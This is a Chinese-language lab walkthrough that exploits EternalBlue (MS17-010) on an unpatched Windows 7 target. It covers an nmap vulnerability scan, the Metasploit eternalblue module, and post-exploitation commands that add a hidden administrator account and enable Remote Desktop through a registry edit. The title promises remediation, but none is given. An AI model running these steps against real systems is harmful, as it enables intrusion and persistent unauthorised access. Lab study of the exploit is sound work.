Windows系统漏洞检测与漏洞利用以及修复（永恒之蓝ms17-010）

前言

●环境：

攻击机：Linux kali（IP：192.168.107.129）
靶机：Windows 7 Enterprise (x64)（IP：192.168.107.143）
实验条件：两台机子可以相互ping通，并且靶机（无补丁）开启了445端口，防火墙是关闭的！

●永恒之蓝介绍:

永恒之蓝漏洞（MS17-010），它的爆发源于 WannaCry 勒索病毒的诞生，该病毒是不法分子利用NSA（National Security Agency，美国国家安全局）泄露的漏洞 “EternalBlue”（永恒之蓝）进行改造而成 。勒索病毒的肆虐，俨然是一场全球性互联网灾难，给广大电脑用户造成了巨大损失。据统计，全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

●漏洞原理：

永恒之蓝漏洞通过 TCP 的445和139端口，来利用 SMBv1 和 NBT 中的远程代码执行漏洞，通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网，即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

●影响版本：

目前已知受影响的 Windows 版本包括但不限于：WindowsNT，Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

●检测windows 7 系统是否存在ms17-010

在kali中使用nmap扫描目标

nmap --script=vuln 192.168.107.143

发现存在ms17-010漏洞
●针对永恒之蓝漏洞利用

1.在kai中使用MSF的永恒之蓝漏洞模块

msfconsole

2.搜索 ms17-010 模块：search ms17_010

search ms17-010

这里我们可以得到一些模块，其中auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块， exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。一般配合使用，前者先扫描，若显示有漏洞，再进行攻击。

3.选择攻击模块，以及查看options

use exploit/windows/smb/ms17_010_eternalblue
show options

4.执行run

5、得到靶机shell

漏洞利用：

shell

输入：chcp 65001 可解决乱码问题。

6、通过shell对靶机进行进一步控制

1.创建一个ppp用户，密码为123456，并且查看

net user ppp 123456 /add
net user

2.将用户ppp添加至管理员组

net localgroup administrators ppp /add
net localgroup administrators

成功添加！！！

3.开启远程桌面功能

查看3389端口是否开启：

netstat -ano

发现没有打开3389端口，通过使用命令修改注册表开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

4.远程桌面连接靶机

远程登录成功！！！